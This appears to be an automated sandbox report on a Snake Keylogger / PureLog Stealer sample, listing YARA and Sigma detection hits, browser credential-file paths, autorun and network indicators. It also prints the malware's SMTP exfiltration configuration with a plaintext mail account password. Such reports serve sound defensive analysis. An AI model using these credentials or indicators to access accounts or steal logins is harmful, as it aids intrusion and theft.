3.2.MSBuild.exe.140000000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x148e6:$a1: get_encryptedPassword 0x14bdc:$a2: get_encryptedUsername 0x146f2:$a3: get_timePasswordChanged 0x147ed:$a4: get_passwordField 0x148fc:$a5: set_encryptedPassword 0x15f0f:$a7: get_logins 0x15e72:$a10: KeyLoggerEventArgs 0x15b0b:$a11: KeyLoggerEventArgsEventHandler
3.2.MSBuild.exe.140000000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c2bb:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b4ed:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b920:$a4: \Orbitum\User Data\Default\Login Data 0x1c95f:$a5: \Kometa\User Data\Default\Login Data
3.2.MSBuild.exe.140000000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1549f:$s1: UnHook 0x154a6:$s2: SetHook 0x154ae:$s3: CallNextHook 0x154bb:$s4: _hook
3.2.MSBuild.exe.140000000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x182d0:$x1: $%SMTPDV$ 0x18342:$x2: $#TheHashHere%& 0x199a5:$x3: %FTPDV$ 0x19a73:$x4: $%TelegramDv$ 0x15b0b:$x5: KeyLoggerEventArgs 0x15e72:$x5: KeyLoggerEventArgs 0x199c9:$m2: Clipboard Logs ID 0x19b6f:$m2: Screenshot Logs ID 0x19c3b:$m2: keystroke Logs ID 0x19b47:$m4: \SnakeKeylogger\
0.2.Pnihosiyvr.exe.1a33d211fd0.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.sssssssssssssssss.exe.20a90de1538.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.sssssssssssssssss.exe.20a90de1538.2.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
11.2.sssssssssssssssss.exe.20a90de1538.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12ae6:$a1: get_encryptedPassword 0x12ddc:$a2: get_encryptedUsername 0x128f2:$a3: get_timePasswordChanged 0x129ed:$a4: get_passwordField 0x12afc:$a5: set_encryptedPassword 0x1410f:$a7: get_logins 0x14072:$a10: KeyLoggerEventArgs 0x13d0b:$a11: KeyLoggerEventArgsEventHandler
11.2.sssssssssssssssss.exe.20a90de1538.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a4bb:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x196ed:$a3: \Google\Chrome\User Data\Default\Login Data 0x19b20:$a4: \Orbitum\User Data\Default\Login Data 0x1ab5f:$a5: \Kometa\User Data\Default\Login Data
11.2.sssssssssssssssss.exe.20a90de1538.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1369f:$s1: UnHook 0x136a6:$s2: SetHook 0x136ae:$s3: CallNextHook 0x136bb:$s4: _hook
11.2.sssssssssssssssss.exe.20a90de1538.2.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x164d0:$x1: $%SMTPDV$ 0x16542:$x2: $#TheHashHere%& 0x17ba5:$x3: %FTPDV$ 0x17c73:$x4: $%TelegramDv$ 0x13d0b:$x5: KeyLoggerEventArgs 0x14072:$x5: KeyLoggerEventArgs 0x17bc9:$m2: Clipboard Logs ID 0x17d6f:$m2: Screenshot Logs ID 0x17e3b:$m2: keystroke Logs ID 0x17d47:$m4: \SnakeKeylogger\
8.2.sssssssssssssssss.exe.1d2a95d0d00.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.sssssssssssssssss.exe.1d2a95d0d00.4.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
8.2.sssssssssssssssss.exe.1d2a95d0d00.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12ae6:$a1: get_encryptedPassword 0x12ddc:$a2: get_encryptedUsername 0x128f2:$a3: get_timePasswordChanged 0x129ed:$a4: get_passwordField 0x12afc:$a5: set_encryptedPassword 0x1410f:$a7: get_logins 0x14072:$a10: KeyLoggerEventArgs 0x13d0b:$a11: KeyLoggerEventArgsEventHandler
8.2.sssssssssssssssss.exe.1d2a95d0d00.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a4bb:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x196ed:$a3: \Google\Chrome\User Data\Default\Login Data 0x19b20:$a4: \Orbitum\User Data\Default\Login Data 0x1ab5f:$a5: \Kometa\User Data\Default\Login Data
8.2.sssssssssssssssss.exe.1d2a95d0d00.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1369f:$s1: UnHook 0x136a6:$s2: SetHook 0x136ae:$s3: CallNextHook 0x136bb:$s4: _hook
8.2.sssssssssssssssss.exe.1d2a95d0d00.4.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x164d0:$x1: $%SMTPDV$ 0x16542:$x2: $#TheHashHere%& 0x17ba5:$x3: %FTPDV$ 0x17c73:$x4: $%TelegramDv$ 0x13d0b:$x5: KeyLoggerEventArgs 0x14072:$x5: KeyLoggerEventArgs 0x17bc9:$m2: Clipboard Logs ID 0x17d6f:$m2: Screenshot Logs ID 0x17e3b:$m2: keystroke Logs ID 0x17d47:$m4: \SnakeKeylogger\
11.2.sssssssssssssssss.exe.20a90de1538.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.sssssssssssssssss.exe.20a90de1538.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
11.2.sssssssssssssssss.exe.20a90de1538.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x148e6:$a1: get_encryptedPassword 0x34d1e:$a1: get_encryptedPassword 0x14bdc:$a2: get_encryptedUsername 0x35014:$a2: get_encryptedUsername 0x146f2:$a3: get_timePasswordChanged 0x34b2a:$a3: get_timePasswordChanged 0x147ed:$a4: get_passwordField 0x34c25:$a4: get_passwordField 0x148fc:$a5: set_encryptedPassword 0x34d34:$a5: set_encryptedPassword 0x15f0f:$a7: get_logins 0x36347:$a7: get_logins 0x15e72:$a10: KeyLoggerEventArgs 0x362aa:$a10: KeyLoggerEventArgs 0x15b0b:$a11: KeyLoggerEventArgsEventHandler 0x35f43:$a11: KeyLoggerEventArgsEventHandler
11.2.sssssssssssssssss.exe.20a90de1538.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c2bb:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3c6f3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b4ed:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b925:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b920:$a4: \Orbitum\User Data\Default\Login Data 0x3bd58:$a4: \Orbitum\User Data\Default\Login Data 0x1c95f:$a5: \Kometa\User Data\Default\Login Data 0x3cd97:$a5: \Kometa\User Data\Default\Login Data
11.2.sssssssssssssssss.exe.20a90de1538.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1549f:$s1: UnHook 0x358d7:$s1: UnHook 0x154a6:$s2: SetHook 0x358de:$s2: SetHook 0x154ae:$s3: CallNextHook 0x358e6:$s3: CallNextHook 0x154bb:$s4: _hook 0x358f3:$s4: _hook
11.2.sssssssssssssssss.exe.20a90de1538.2.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x182d0:$x1: $%SMTPDV$ 0x38708:$x1: $%SMTPDV$ 0x18342:$x2: $#TheHashHere%& 0x3877a:$x2: $#TheHashHere%& 0x199a5:$x3: %FTPDV$ 0x39ddd:$x3: %FTPDV$ 0x19a73:$x4: $%TelegramDv$ 0x39eab:$x4: $%TelegramDv$ 0x15b0b:$x5: KeyLoggerEventArgs 0x15e72:$x5: KeyLoggerEventArgs 0x35f43:$x5: KeyLoggerEventArgs 0x362aa:$x5: KeyLoggerEventArgs 0x199c9:$m2: Clipboard Logs ID 0x19b6f:$m2: Screenshot Logs ID 0x19c3b:$m2: keystroke Logs ID 0x39e01:$m2: Clipboard Logs ID 0x39fa7:$m2: Screenshot Logs ID 0x3a073:$m2: keystroke Logs ID 0x19b47:$m4: \SnakeKeylogger\ 0x39f7f:$m4: \SnakeKeylogger\
8.2.sssssssssssssssss.exe.1d2a97c0350.8.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.Pnihosiyvr.exe.1a33d23a008.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Pnihosiyvr.exe.1a33d6ea0e8.9.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.sssssssssssssssss.exe.1d2a97c0350.8.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.Pnihosiyvr.exe.1a33d28a040.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x96356:$a1: get_encryptedPassword 0xb678e:$a1: get_encryptedPassword 0x9664c:$a2: get_encryptedUsername 0xb6a84:$a2: get_encryptedUsername 0x96162:$a3: get_timePasswordChanged 0xb659a:$a3: get_timePasswordChanged 0x9625d:$a4: get_passwordField 0xb6695:$a4: get_passwordField 0x9636c:$a5: set_encryptedPassword 0xb67a4:$a5: set_encryptedPassword 0x9797f:$a7: get_logins 0xb7db7:$a7: get_logins 0x978e2:$a10: KeyLoggerEventArgs 0xb7d1a:$a10: KeyLoggerEventArgs 0x9757b:$a11: KeyLoggerEventArgsEventHandler 0xb79b3:$a11: KeyLoggerEventArgsEventHandler
0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x96f0f:$s1: UnHook 0xb7347:$s1: UnHook 0x96f16:$s2: SetHook 0xb734e:$s2: SetHook 0x96f1e:$s3: CallNextHook 0xb7356:$s3: CallNextHook 0x96f2b:$s4: _hook 0xb7363:$s4: _hook
0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x99d40:$x1: $%SMTPDV$ 0xba178:$x1: $%SMTPDV$ 0x99db2:$x2: $#TheHashHere%& 0xba1ea:$x2: $#TheHashHere%& 0x9b415:$x3: %FTPDV$ 0xbb84d:$x3: %FTPDV$ 0x9b4e3:$x4: $%TelegramDv$ 0xbb91b:$x4: $%TelegramDv$ 0x9757b:$x5: KeyLoggerEventArgs 0x978e2:$x5: KeyLoggerEventArgs 0xb79b3:$x5: KeyLoggerEventArgs 0xb7d1a:$x5: KeyLoggerEventArgs 0x9b439:$m2: Clipboard Logs ID 0x9b5df:$m2: Screenshot Logs ID 0x9b6ab:$m2: keystroke Logs ID 0xbb871:$m2: Clipboard Logs ID 0xbba17:$m2: Screenshot Logs ID 0xbbae3:$m2: keystroke Logs ID 0x9b5b7:$m4: \SnakeKeylogger\ 0xbb9ef:$m4: \SnakeKeylogger\
0.2.Pnihosiyvr.exe.1a3456f0000.12.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.sssssssssssssssss.exe.1d2a9798318.5.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
8.2.sssssssssssssssss.exe.1d2a95d0d00.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.sssssssssssssssss.exe.1d2a95d0d00.4.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
8.2.sssssssssssssssss.exe.1d2a95d0d00.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x148e6:$a1: get_encryptedPassword 0x34d1e:$a1: get_encryptedPassword 0x14bdc:$a2: get_encryptedUsername 0x35014:$a2: get_encryptedUsername 0x146f2:$a3: get_timePasswordChanged 0x34b2a:$a3: get_timePasswordChanged 0x147ed:$a4: get_passwordField 0x34c25:$a4: get_passwordField 0x148fc:$a5: set_encryptedPassword 0x34d34:$a5: set_encryptedPassword 0x15f0f:$a7: get_logins 0x36347:$a7: get_logins 0x15e72:$a10: KeyLoggerEventArgs 0x362aa:$a10: KeyLoggerEventArgs 0x15b0b:$a11: KeyLoggerEventArgsEventHandler 0x35f43:$a11: KeyLoggerEventArgsEventHandler
8.2.sssssssssssssssss.exe.1d2a95d0d00.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c2bb:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3c6f3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b4ed:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b925:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b920:$a4: \Orbitum\User Data\Default\Login Data 0x3bd58:$a4: \Orbitum\User Data\Default\Login Data 0x1c95f:$a5: \Kometa\User Data\Default\Login Data 0x3cd97:$a5: \Kometa\User Data\Default\Login Data
8.2.sssssssssssssssss.exe.1d2a95d0d00.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1549f:$s1: UnHook 0x358d7:$s1: UnHook 0x154a6:$s2: SetHook 0x358de:$s2: SetHook 0x154ae:$s3: CallNextHook 0x358e6:$s3: CallNextHook 0x154bb:$s4: _hook 0x358f3:$s4: _hook
8.2.sssssssssssssssss.exe.1d2a95d0d00.4.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x182d0:$x1: $%SMTPDV$ 0x38708:$x1: $%SMTPDV$ 0x18342:$x2: $#TheHashHere%& 0x3877a:$x2: $#TheHashHere%& 0x199a5:$x3: %FTPDV$ 0x39ddd:$x3: %FTPDV$ 0x19a73:$x4: $%TelegramDv$ 0x39eab:$x4: $%TelegramDv$ 0x15b0b:$x5: KeyLoggerEventArgs 0x15e72:$x5: KeyLoggerEventArgs 0x35f43:$x5: KeyLoggerEventArgs 0x362aa:$x5: KeyLoggerEventArgs 0x199c9:$m2: Clipboard Logs ID 0x19b6f:$m2: Screenshot Logs ID 0x19c3b:$m2: keystroke Logs ID 0x39e01:$m2: Clipboard Logs ID 0x39fa7:$m2: Screenshot Logs ID 0x3a073:$m2: keystroke Logs ID 0x19b47:$m4: \SnakeKeylogger\ 0x39f7f:$m4: \SnakeKeylogger\
8.2.sssssssssssssssss.exe.1d2a95824c8.13.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.sssssssssssssssss.exe.1d2a95824c8.13.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
8.2.sssssssssssssssss.exe.1d2a95824c8.13.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
8.2.sssssssssssssssss.exe.1d2a95824c8.13.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x6311e:$a1: get_encryptedPassword 0x83556:$a1: get_encryptedPassword 0x63414:$a2: get_encryptedUsername 0x8384c:$a2: get_encryptedUsername 0x62f2a:$a3: get_timePasswordChanged 0x83362:$a3: get_timePasswordChanged 0x63025:$a4: get_passwordField 0x8345d:$a4: get_passwordField 0x63134:$a5: set_encryptedPassword 0x8356c:$a5: set_encryptedPassword 0x64747:$a7: get_logins 0x84b7f:$a7: get_logins 0x646aa:$a10: KeyLoggerEventArgs 0x84ae2:$a10: KeyLoggerEventArgs 0x64343:$a11: KeyLoggerEventArgsEventHandler 0x8477b:$a11: KeyLoggerEventArgsEventHandler
8.2.sssssssssssssssss.exe.1d2a95824c8.13.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x6aaf3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x8af2b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x69d25:$a3: \Google\Chrome\User Data\Default\Login Data 0x8a15d:$a3: \Google\Chrome\User Data\Default\Login Data 0x6a158:$a4: \Orbitum\User Data\Default\Login Data 0x8a590:$a4: \Orbitum\User Data\Default\Login Data 0x6b197:$a5: \Kometa\User Data\Default\Login Data 0x8b5cf:$a5: \Kometa\User Data\Default\Login Data
8.2.sssssssssssssssss.exe.1d2a95824c8.13.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x63cd7:$s1: UnHook 0x8410f:$s1: UnHook 0x63cde:$s2: SetHook 0x84116:$s2: SetHook 0x63ce6:$s3: CallNextHook 0x8411e:$s3: CallNextHook 0x63cf3:$s4: _hook 0x8412b:$s4: _hook
8.2.sssssssssssssssss.exe.1d2a95824c8.13.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x66b08:$x1: $%SMTPDV$ 0x86f40:$x1: $%SMTPDV$ 0x66b7a:$x2: $#TheHashHere%& 0x86fb2:$x2: $#TheHashHere%& 0x681dd:$x3: %FTPDV$ 0x88615:$x3: %FTPDV$ 0x682ab:$x4: $%TelegramDv$ 0x886e3:$x4: $%TelegramDv$ 0x64343:$x5: KeyLoggerEventArgs 0x646aa:$x5: KeyLoggerEventArgs 0x8477b:$x5: KeyLoggerEventArgs 0x84ae2:$x5: KeyLoggerEventArgs 0x68201:$m2: Clipboard Logs ID 0x683a7:$m2: Screenshot Logs ID 0x68473:$m2: keystroke Logs ID 0x88639:$m2: Clipboard Logs ID 0x887df:$m2: Screenshot Logs ID 0x888ab:$m2: keystroke Logs ID 0x6837f:$m4: \SnakeKeylogger\ 0x887b7:$m4: \SnakeKeylogger\
0.2.Pnihosiyvr.exe.1a33d91ac90.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Pnihosiyvr.exe.1a33d91ac90.8.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Pnihosiyvr.exe.1a33d91ac90.8.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x10e3c6:$a1: get_encryptedPassword 0x12e7fe:$a1: get_encryptedPassword 0x10e6bc:$a2: get_encryptedUsername 0x12eaf4:$a2: get_encryptedUsername 0x10e1d2:$a3: get_timePasswordChanged 0x12e60a:$a3: get_timePasswordChanged 0x10e2cd:$a4: get_passwordField 0x12e705:$a4: get_passwordField 0x10e3dc:$a5: set_encryptedPassword 0x12e814:$a5: set_encryptedPassword 0x10f9ef:$a7: get_logins 0x12fe27:$a7: get_logins 0x10f952:$a10: KeyLoggerEventArgs 0x12fd8a:$a10: KeyLoggerEventArgs 0x10f5eb:$a11: KeyLoggerEventArgsEventHandler 0x12fa23:$a11: KeyLoggerEventArgsEventHandler
0.2.Pnihosiyvr.exe.1a33d91ac90.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x10ef7f:$s1: UnHook 0x12f3b7:$s1: UnHook 0x10ef86:$s2: SetHook 0x12f3be:$s2: SetHook 0x10ef8e:$s3: CallNextHook 0x12f3c6:$s3: CallNextHook 0x10ef9b:$s4: _hook 0x12f3d3:$s4: _hook
0.2.Pnihosiyvr.exe.1a33d91ac90.8.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x111db0:$x1: $%SMTPDV$ 0x1321e8:$x1: $%SMTPDV$ 0x111e22:$x2: $#TheHashHere%& 0x13225a:$x2: $#TheHashHere%& 0x113485:$x3: %FTPDV$ 0x1338bd:$x3: %FTPDV$ 0x113553:$x4: $%TelegramDv$ 0x13398b:$x4: $%TelegramDv$ 0x10f5eb:$x5: KeyLoggerEventArgs 0x10f952:$x5: KeyLoggerEventArgs 0x12fa23:$x5: KeyLoggerEventArgs 0x12fd8a:$x5: KeyLoggerEventArgs 0x1134a9:$m2: Clipboard Logs ID 0x11364f:$m2: Screenshot Logs ID 0x11371b:$m2: keystroke Logs ID 0x1338e1:$m2: Clipboard Logs ID 0x133a87:$m2: Screenshot Logs ID 0x133b53:$m2: keystroke Logs ID 0x113627:$m4: \SnakeKeylogger\ 0x133a5f:$m4: \SnakeKeylogger\
0.2.Pnihosiyvr.exe.1a3456f0000.12.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Pnihosiyvr.exe.1a33d6ea0e8.9.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Pnihosiyvr.exe.1a33d942cc8.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Pnihosiyvr.exe.1a33d942cc8.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Pnihosiyvr.exe.1a33d942cc8.6.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Pnihosiyvr.exe.1a33d942cc8.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe638e:$a1: get_encryptedPassword 0x1067c6:$a1: get_encryptedPassword 0xe6684:$a2: get_encryptedUsername 0x106abc:$a2: get_encryptedUsername 0xe619a:$a3: get_timePasswordChanged 0x1065d2:$a3: get_timePasswordChanged 0xe6295:$a4: get_passwordField 0x1066cd:$a4: get_passwordField 0xe63a4:$a5: set_encryptedPassword 0x1067dc:$a5: set_encryptedPassword 0xe79b7:$a7: get_logins 0x107def:$a7: get_logins 0xe791a:$a10: KeyLoggerEventArgs 0x107d52:$a10: KeyLoggerEventArgs 0xe75b3:$a11: KeyLoggerEventArgsEventHandler 0x1079eb:$a11: KeyLoggerEventArgsEventHandler
0.2.Pnihosiyvr.exe.1a33d942cc8.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xe6f47:$s1: UnHook 0x10737f:$s1: UnHook 0xe6f4e:$s2: SetHook 0x107386:$s2: SetHook 0xe6f56:$s3: CallNextHook 0x10738e:$s3: CallNextHook 0xe6f63:$s4: _hook 0x10739b:$s4: _hook
0.2.Pnihosiyvr.exe.1a33d942cc8.6.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0xe9d78:$x1: $%SMTPDV$ 0x10a1b0:$x1: $%SMTPDV$ 0xe9dea:$x2: $#TheHashHere%& 0x10a222:$x2: $#TheHashHere%& 0xeb44d:$x3: %FTPDV$ 0x10b885:$x3: %FTPDV$ 0xeb51b:$x4: $%TelegramDv$ 0x10b953:$x4: $%TelegramDv$ 0xe75b3:$x5: KeyLoggerEventArgs 0xe791a:$x5: KeyLoggerEventArgs 0x1079eb:$x5: KeyLoggerEventArgs 0x107d52:$x5: KeyLoggerEventArgs 0xeb471:$m2: Clipboard Logs ID 0xeb617:$m2: Screenshot Logs ID 0xeb6e3:$m2: keystroke Logs ID 0x10b8a9:$m2: Clipboard Logs ID 0x10ba4f:$m2: Screenshot Logs ID 0x10bb1b:$m2: keystroke Logs ID 0xeb5ef:$m4: \SnakeKeylogger\ 0x10ba27:$m4: \SnakeKeylogger\
0.2.Pnihosiyvr.exe.1a33d211fd0.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Pnihosiyvr.exe.1a33d28a040.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Pnihosiyvr.exe.1a33d23a008.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 68 entries

Sigma Signatures

System Summary

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 158.101.44.242, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 2128, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49717

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Pnihosiyvr.exe, ProcessId: 6180, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sssssssssssssssss

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://scratchdreams.tk

Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.2332481252.000001A34568A000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "mensure.ceylan@guneyoto.com.tr", "Password": "Batman7221", "Host": "mail.guneyoto.com.tr", "Port": "587"}

Multi AV Scanner detection for domain / URL

Source: https://scratchdreams.tk

Virustotal: Detection: 15%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Virustotal: Detection: 55%			Perma Link

Multi AV Scanner detection for submitted file

Source: Pnihosiyvr.exe	ReversingLabs: Detection: 39%
Source: Pnihosiyvr.exe	Virustotal: Detection: 55%			Perma Link

Source: unknown	HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49711 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49732 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49745 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49730 version: TLS 1.2

Source: Pnihosiyvr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\MSBuild.pdb% source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\MSBuild.pdb source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdba source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: Pnihosiyvr.exe, 00000000.00000002.2332061251.000001A3453E0000.00000004.08000000.00040000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9986000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9922000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: protobuf-net.pdb source: Pnihosiyvr.exe, 00000000.00000002.2332061251.000001A3453E0000.00000004.08000000.00040000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9986000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9922000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER2BA4.tmp.dmp.6.dr
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.pdb source: MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp
